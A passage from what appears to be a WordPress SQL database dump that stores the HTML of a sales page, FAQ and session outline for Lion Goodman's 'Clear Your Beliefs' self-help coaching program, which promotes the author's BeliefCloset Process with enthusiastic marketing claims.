course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-17 18:41:01', '2015-05-17 23:41:01', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2185, 2, '2015-05-17 18:42:13', '2015-05-17 23:42:13', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" 